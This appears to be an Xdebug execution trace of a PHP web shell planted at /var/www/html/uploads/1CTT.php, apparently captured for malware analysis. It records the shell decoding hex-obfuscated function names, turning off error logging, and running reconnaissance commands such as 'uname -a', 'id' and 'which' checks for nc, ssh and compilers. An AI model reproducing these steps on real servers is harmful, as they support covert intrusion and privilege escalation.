3	1752	1	0.064736	723216
3	1752	R			103
3	1753	0	0.064749	723136	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1753	1	0.064760	723176
3	1753	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1754	0	0.064790	723168	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1754	1	0.064802	723216
3	1754	R			101
3	1755	0	0.064814	723136	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1755	1	0.064825	723176
3	1755	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1756	0	0.064855	723168	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1756	1	0.064866	723216
3	1756	R			116
3	1757	0	0.064879	723136	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1757	1	0.064890	723176
3	1757	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1758	0	0.064920	723168	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1758	1	0.064931	723216
3	1758	R			115
3	1759	0	0.064944	723136	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1759	1	0.064955	723176
3	1759	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1749	1	0.064985	723136
2	1749	R			'fgets'
1		A						/var/www/html/uploads/1CTT.php	7	$func[91] = 'fgets'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1760	0	0.065019	723136	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66636c6f7365'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1761	0	0.065059	723168	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1761	1	0.065070	723216
3	1761	R			102
3	1762	0	0.065083	723136	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1762	1	0.065094	723176
3	1762	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1763	0	0.065125	723200	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1763	1	0.065137	723248
3	1763	R			99
3	1764	0	0.065149	723168	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1764	1	0.065161	723208
3	1764	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1765	0	0.065191	723200	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1765	1	0.065203	723248
3	1765	R			108
3	1766	0	0.065215	723168	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1766	1	0.065226	723208
3	1766	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1767	0	0.065257	723200	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1767	1	0.065272	723248
3	1767	R			111
3	1768	0	0.065285	723168	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1768	1	0.065296	723208
3	1768	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1769	0	0.065326	723200	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1769	1	0.065338	723248
3	1769	R			115
3	1770	0	0.065350	723168	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1770	1	0.065360	723208
3	1770	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1771	0	0.065391	723200	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1771	1	0.065402	723248
3	1771	R			101
3	1772	0	0.065414	723168	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1772	1	0.065426	723208
3	1772	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1760	1	0.065456	723168
2	1760	R			'fclose'
1		A						/var/www/html/uploads/1CTT.php	7	$func[92] = 'fclose'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1773	0	0.065491	723168	session_start	0		/var/www/html/uploads/1CTT.php	10	0
2	1773	1	0.065570	723920
2	1773	R			TRUE
2	1774	0	0.065587	723920	error_reporting	0		/var/www/html/uploads/1CTT.php	11	1	0
2	1774	1	0.065602	723960
2	1774	R			22527
2	1775	0	0.065616	723920	set_time_limit	0		/var/www/html/uploads/1CTT.php	12	1	0
2	1775	1	0.065632	723984
2	1775	R			FALSE
2	1776	0	0.065646	723952	clearstatcache	0		/var/www/html/uploads/1CTT.php	13	0
2	1776	1	0.065658	723952
2	1776	R			NULL
2	1777	0	0.065672	723952	ini_set	0		/var/www/html/uploads/1CTT.php	14	2	'error_log'	NULL
2	1777	1	0.065687	724024
2	1777	R			''
2	1778	0	0.065701	723952	ini_set	0		/var/www/html/uploads/1CTT.php	15	2	'log_errors'	0
2	1778	1	0.065715	724024
2	1778	R			'1'
2	1779	0	0.065728	723952	ini_set	0		/var/www/html/uploads/1CTT.php	16	2	'max_execution_time'	0
2	1779	1	0.065741	723992
2	1779	R			'0'
2	1780	0	0.065754	723920	ini_set	0		/var/www/html/uploads/1CTT.php	17	2	'output_buffering'	0
2	1780	1	0.065768	723992
2	1780	R			FALSE
2	1781	0	0.065781	723920	ini_set	0		/var/www/html/uploads/1CTT.php	18	2	'display_errors'	0
2	1781	1	0.065795	723992
2	1781	R			''
2	1782	0	0.065808	723920	date_default_timezone_set	0		/var/www/html/uploads/1CTT.php	19	1	'Asia/Jakarta'
2	1782	1	0.065825	723984
2	1782	R			TRUE
2	1783	0	0.065840	723936	getcwd	0		/var/www/html/uploads/1CTT.php	25	0
2	1783	1	0.065853	723984
2	1783	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1CTT.php	25	$dir = '/var/www/html/uploads'
2	1784	0	0.065880	723984	file_exists	0		/var/www/html/uploads/1CTT.php	28	1	'/etc/named.conf'
2	1784	1	0.065899	724024
2	1784	R			FALSE
1		A						/var/www/html/uploads/1CTT.php	51	$dom = '<font class=\'text-danger\'>Can\'t Read /etc/named.conf</font>'
2	1785	0	0.065928	723984	str_replace	0		/var/www/html/uploads/1CTT.php	54	3	'\\'	'/'	'/var/www/html/uploads'
2	1785	1	0.065943	724080
2	1785	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1CTT.php	54	$dir = '/var/www/html/uploads'
2	1786	0	0.065968	723984	explode	0		/var/www/html/uploads/1CTT.php	55	2	'/'	'/var/www/html/uploads'
2	1786	1	0.065982	724560
2	1786	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/1CTT.php	55	$scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2	1787	0	0.066016	724488	disk_total_space	0		/var/www/html/uploads/1CTT.php	56	1	'/var/www/html/uploads'
2	1787	1	0.066033	724520
2	1787	R			232015802368
1		A						/var/www/html/uploads/1CTT.php	56	$total = 232015802368
2	1788	0	0.066059	724488	disk_free_space	0		/var/www/html/uploads/1CTT.php	57	1	'/var/www/html/uploads'
2	1788	1	0.066073	724520
2	1788	R			201430454272
1		A						/var/www/html/uploads/1CTT.php	57	$free = 201430454272
1		A						/var/www/html/uploads/1CTT.php	58	$pers = 86
2	1789	0	0.066112	724488	ini_get	0		/var/www/html/uploads/1CTT.php	59	1	'disable_functions'
2	1789	1	0.066127	724968
2	1789	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/1CTT.php	59	$ds = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/1CTT.php	60	$show_ds = '<font class=\'text-danger\'>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</font>'
2	1790	0	0.066196	725384	exe	1		/var/www/html/uploads/1CTT.php	62	1	'uname -a'
2		A						/var/www/html/uploads/1CTT.php	256	$out = ''
3	1791	0	0.066220	725408	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
3	1791	1	0.066234	725448
3	1791	R			TRUE
3	1792	0	0.066247	725432	exec	0		/var/www/html/uploads/1CTT.php	259	2	'uname -a'	''
3	1792	1	0.067491	726192
3	1792	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
3	1793	0	0.067526	725968	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux']
3	1793	1	0.067548	726032
3	1793	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
2		A						/var/www/html/uploads/1CTT.php	260	$out = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
2	1790	1	0.067587	725568
2	1790	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
1		A						/var/www/html/uploads/1CTT.php	62	$cmd_uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
2	1794	0	0.067624	725568	function_exists	0		/var/www/html/uploads/1CTT.php	63	1	'php_uname'
2	1794	1	0.067638	725608
2	1794	R			TRUE
2	1795	0	0.067653	725568	php_uname	0		/var/www/html/uploads/1CTT.php	63	0
2	1795	1	0.067666	725680
2	1795	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	1796	0	0.067684	725680	substr	0		/var/www/html/uploads/1CTT.php	63	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
2	1796	1	0.067702	725776
2	1796	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/1CTT.php	63	$uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	1797	0	0.067736	725680	substr	0		/var/www/html/uploads/1CTT.php	65	3	'Linux'	0	3
2	1797	1	0.067750	725808
2	1797	R			'Lin'
2	1798	0	0.067764	725712	strtolower	0		/var/www/html/uploads/1CTT.php	65	1	'Lin'
2	1798	1	0.067777	725776
2	1798	R			'lin'
1		A						/var/www/html/uploads/1CTT.php	68	$sys = 'unix'
1		A						/var/www/html/uploads/1CTT.php	105	$do = 'filesman'
1		A						/var/www/html/uploads/1CTT.php	106	$title = 'Files Manager'
1		A						/var/www/html/uploads/1CTT.php	107	$icon = 'archive'
2	1799	0	0.067835	725680	ini_get	0		/var/www/html/uploads/1CTT.php	131	1	'open_basedir'
2	1799	1	0.067849	725712
2	1799	R			''
1		A						/var/www/html/uploads/1CTT.php	139	$open_b = '<font class="text-warning">NONE</font>'
2	1800	0	0.067875	725680	function_exists	0		/var/www/html/uploads/1CTT.php	142	1	'posix_getegid'
2	1800	1	0.067888	725720
2	1800	R			TRUE
2	1801	0	0.067902	725680	function_exists	0		/var/www/html/uploads/1CTT.php	148	1	'posix_getpwuid'
2	1801	1	0.067917	725720
2	1801	R			TRUE
2	1802	0	0.067930	725680	function_exists	0		/var/www/html/uploads/1CTT.php	148	1	'posix_geteuid'
2	1802	1	0.067967	725720
2	1802	R			TRUE
2	1803	0	0.067981	725680	posix_geteuid	0		/var/www/html/uploads/1CTT.php	148	0
2	1803	1	0.068001	725680
2	1803	R			33
2	1804	0	0.068014	725680	posix_getpwuid	0		/var/www/html/uploads/1CTT.php	148	1	33
2	1804	1	0.068048	726512
2	1804	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1		A						/var/www/html/uploads/1CTT.php	148	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
2	1805	0	0.068092	726480	function_exists	0		/var/www/html/uploads/1CTT.php	149	1	'posix_getgrgid'
2	1805	1	0.068106	726520
2	1805	R			TRUE
2	1806	0	0.068118	726480	function_exists	0		/var/www/html/uploads/1CTT.php	149	1	'posix_getegid'
2	1806	1	0.068131	726520
2	1806	R			TRUE
2	1807	0	0.068144	726480	posix_getegid	0		/var/www/html/uploads/1CTT.php	149	0
2	1807	1	0.068156	726480
2	1807	R			33
2	1808	0	0.068168	726480	posix_getgrgid	0		/var/www/html/uploads/1CTT.php	149	1	33
2	1808	1	0.068195	727144
2	1808	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/1CTT.php	149	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/1CTT.php	150	$user = 'www-data'
1		A						/var/www/html/uploads/1CTT.php	151	$uid = 33
1		A						/var/www/html/uploads/1CTT.php	152	$group = 'www-data'
1		A						/var/www/html/uploads/1CTT.php	153	$gid = 33
2	1809	0	0.068273	725760	ini_get	0		/var/www/html/uploads/1CTT.php	157	1	'safe_mode'
2	1809	1	0.068287	725792
2	1809	R			FALSE
2	1810	0	0.068301	725760	exe	1		/var/www/html/uploads/1CTT.php	158	1	'id'
2		A						/var/www/html/uploads/1CTT.php	256	$out = ''
3	1811	0	0.068323	725760	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
3	1811	1	0.068336	725800
3	1811	R			TRUE
3	1812	0	0.068348	725784	exec	0		/var/www/html/uploads/1CTT.php	259	2	'id'	''
3	1812	1	0.069709	726384
3	1812	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3	1813	0	0.069736	726240	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
3	1813	1	0.069754	726304
3	1813	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2		A						/var/www/html/uploads/1CTT.php	260	$out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	1810	1	0.069784	725840
2	1810	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	1814	0	0.069801	725840	strlen	0		/var/www/html/uploads/1CTT.php	158	1	'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	1814	1	0.069815	725872
2	1814	R			53
1		A						/var/www/html/uploads/1CTT.php	159	$userful = [0 => 'gcc', 1 => 'lcc', 2 => 'cc', 3 => 'ld', 4 => 'make', 5 => 'php', 6 => 'perl', 7 => 'python', 8 => 'ruby', 9 => 'tar', 10 => 'gzip', 11 => 'bzip', 12 => 'bzialfa2', 13 => 'nc', 14 => 'locate', 15 => 'suidperl', 16 => 'git', 17 => 'docker', 18 => 'ssh']
1		A						/var/www/html/uploads/1CTT.php	160	$x = 0
2	1815	0	0.069866	725760	which	1		/var/www/html/uploads/1CTT.php	162	1	'gcc'
3	1816	0	0.069880	725800	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which gcc'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1817	0	0.069903	725800	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1817	1	0.069918	725840
4	1817	R			TRUE
4	1818	0	0.069931	725824	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which gcc'	''
4	1818	1	0.071177	726344
4	1818	R			'/usr/bin/gcc'
4	1819	0	0.071201	726240	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/gcc']
4	1819	1	0.071218	726304
4	1819	R			'/usr/bin/gcc'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/gcc'
3	1816	1	0.071246	725840
3	1816	R			'/usr/bin/gcc'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/gcc'
3	1820	0	0.071272	725800	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/gcc'
3	1820	1	0.071286	725832
3	1820	R			12
2	1815	1	0.071299	725760
2	1815	R			12
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'gcc, '
2	1821	0	0.071335	725792	which	1		/var/www/html/uploads/1CTT.php	162	1	'lcc'
3	1822	0	0.071349	725832	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which lcc'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1823	0	0.071377	725832	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1823	1	0.071391	725872
4	1823	R			TRUE
4	1824	0	0.071405	725856	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which lcc'	''
4	1824	1	0.072575	725976
4	1824	R			''
4	1825	0	0.072599	725912	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1825	1	0.072613	725976
4	1825	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1822	1	0.072639	725832
3	1822	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1821	1	0.072663	725792
2	1821	R			FALSE
2	1826	0	0.072677	725792	which	1		/var/www/html/uploads/1CTT.php	162	1	'cc'
3	1827	0	0.072691	725832	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which cc'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1828	0	0.072713	725832	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1828	1	0.072728	725872
4	1828	R			TRUE
4	1829	0	0.072741	725856	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which cc'	''
4	1829	1	0.073959	726376
4	1829	R			'/usr/bin/cc'
4	1830	0	0.073984	726272	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/cc']
4	1830	1	0.074001	726336
4	1830	R			'/usr/bin/cc'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/cc'
3	1827	1	0.074028	725872
3	1827	R			'/usr/bin/cc'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/cc'
3	1831	0	0.074054	725832	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/cc'
3	1831	1	0.074068	725864
3	1831	R			11
2	1826	1	0.074081	725792
2	1826	R			11
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'cc, '
2	1832	0	0.074114	725800	which	1		/var/www/html/uploads/1CTT.php	162	1	'ld'
3	1833	0	0.074128	725840	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which ld'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1834	0	0.074150	725840	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1834	1	0.074163	725880
4	1834	R			TRUE
4	1835	0	0.074176	725864	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which ld'	''
4	1835	1	0.075406	726384
4	1835	R			'/usr/bin/ld'
4	1836	0	0.075430	726280	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/ld']
4	1836	1	0.075447	726344
4	1836	R			'/usr/bin/ld'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/ld'
3	1833	1	0.075474	725880
3	1833	R			'/usr/bin/ld'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/ld'
3	1837	0	0.075501	725840	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/ld'
3	1837	1	0.075514	725872
3	1837	R			11
2	1832	1	0.075527	725800
2	1832	R			11
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'ld, '
2	1838	0	0.075560	725800	which	1		/var/www/html/uploads/1CTT.php	162	1	'make'
3	1839	0	0.075574	725840	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which make'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1840	0	0.075596	725840	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1840	1	0.075609	725880
4	1840	R			TRUE
4	1841	0	0.075623	725864	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which make'	''
4	1841	1	0.076904	726384
4	1841	R			'/usr/bin/make'
4	1842	0	0.076929	726280	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/make']
4	1842	1	0.076946	726344
4	1842	R			'/usr/bin/make'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/make'
3	1839	1	0.076974	725880
3	1839	R			'/usr/bin/make'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/make'
3	1843	0	0.077000	725840	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/make'
3	1843	1	0.077021	725872
3	1843	R			13
2	1838	1	0.077035	725800
2	1838	R			13
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'make, '
2	1844	0	0.077069	725808	which	1		/var/www/html/uploads/1CTT.php	162	1	'php'
3	1845	0	0.077082	725848	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which php'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1846	0	0.077105	725848	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1846	1	0.077118	725888
4	1846	R			TRUE
4	1847	0	0.077131	725872	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which php'	''
4	1847	1	0.078342	726392
4	1847	R			'/usr/bin/php'
4	1848	0	0.078366	726288	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/php']
4	1848	1	0.078383	726352
4	1848	R			'/usr/bin/php'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/php'
3	1845	1	0.078411	725888
3	1845	R			'/usr/bin/php'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/php'
3	1849	0	0.078438	725848	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/php'
3	1849	1	0.078451	725880
3	1849	R			12
2	1844	1	0.078464	725808
2	1844	R			12
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'php, '
2	1850	0	0.078498	725816	which	1		/var/www/html/uploads/1CTT.php	162	1	'perl'
3	1851	0	0.078511	725856	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which perl'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1852	0	0.078534	725856	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1852	1	0.078547	725896
4	1852	R			TRUE
4	1853	0	0.078561	725880	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which perl'	''
4	1853	1	0.079777	726400
4	1853	R			'/usr/bin/perl'
4	1854	0	0.079802	726296	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/perl']
4	1854	1	0.079819	726360
4	1854	R			'/usr/bin/perl'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/perl'
3	1851	1	0.079847	725896
3	1851	R			'/usr/bin/perl'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/perl'
3	1855	0	0.079873	725856	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/perl'
3	1855	1	0.079887	725888
3	1855	R			13
2	1850	1	0.079900	725816
2	1850	R			13
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'perl, '
2	1856	0	0.079964	725816	which	1		/var/www/html/uploads/1CTT.php	162	1	'python'
3	1857	0	0.079979	725856	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which python'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1858	0	0.080003	725856	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1858	1	0.080017	725896
4	1858	R			TRUE
4	1859	0	0.080030	725880	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which python'	''
4	1859	1	0.081181	726000
4	1859	R			''
4	1860	0	0.081205	725936	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1860	1	0.081220	726000
4	1860	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1857	1	0.081245	725856
3	1857	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1856	1	0.081270	725816
2	1856	R			FALSE
2	1861	0	0.081283	725816	which	1		/var/www/html/uploads/1CTT.php	162	1	'ruby'
3	1862	0	0.081297	725856	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which ruby'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1863	0	0.081321	725856	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1863	1	0.081335	725896
4	1863	R			TRUE
4	1864	0	0.081349	725880	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which ruby'	''
4	1864	1	0.082537	726000
4	1864	R			''
4	1865	0	0.082560	725936	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[]
4	1865	1	0.082574	726000
4	1865	R			''
3		A						/var/www/html/uploads/1CTT.php	260	$out = ''
3	1862	1	0.082605	725856
3	1862	R			''
2		A						/var/www/html/uploads/1CTT.php	370	$path = ''
2	1861	1	0.082638	725816
2	1861	R			FALSE
2	1866	0	0.082652	725816	which	1		/var/www/html/uploads/1CTT.php	162	1	'tar'
3	1867	0	0.082665	725856	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which tar'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1868	0	0.082689	725856	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1868	1	0.082703	725896
4	1868	R			TRUE
4	1869	0	0.082717	725880	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which tar'	''
4	1869	1	0.083951	726400
4	1869	R			'/usr/bin/tar'
4	1870	0	0.083977	726296	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/tar']
4	1870	1	0.083994	726360
4	1870	R			'/usr/bin/tar'
3		A						/var/www/html/uploads/1CTT.php	260	$out = '/usr/bin/tar'
3	1867	1	0.084021	725896
3	1867	R			'/usr/bin/tar'
2		A						/var/www/html/uploads/1CTT.php	370	$path = '/usr/bin/tar'
3	1871	0	0.084047	725856	strlen	0		/var/www/html/uploads/1CTT.php	372	1	'/usr/bin/tar'
3	1871	1	0.084061	725888
3	1871	R			12
2	1866	1	0.084074	725816
2	1866	R			12
1		A						/var/www/html/uploads/1CTT.php	163	$x++
1		A						/var/www/html/uploads/1CTT.php	164	$useful .= 'tar, '
2	1872	0	0.084107	725824	which	1		/var/www/html/uploads/1CTT.php	162	1	'gzip'
3	1873	0	0.084120	725864	exe	1		/var/www/html/uploads/1CTT.php	370	1	'which gzip'
3		A						/var/www/html/uploads/1CTT.php	256	$out = ''
4	1874	0	0.084143	725864	function_exists	0		/var/www/html/uploads/1CTT.php	258	1	'exec'
4	1874	1	0.084156	725904
4	1874	R			TRUE
4	1875	0	0.084169	725888	exec	0		/var/www/html/uploads/1CTT.php	259	2	'which gzip'	''
4	1875	1	0.085386	726408
4	1875	R			'/usr/bin/gzip'
4	1876	0	0.085411	726304	join	0		/var/www/html/uploads/1CTT.php	260	2	'\n'	[0 => '/usr/bin/gzip']
4	1876	1	0.085427	726368
4	1876	R			'/usr/bin/gzip'
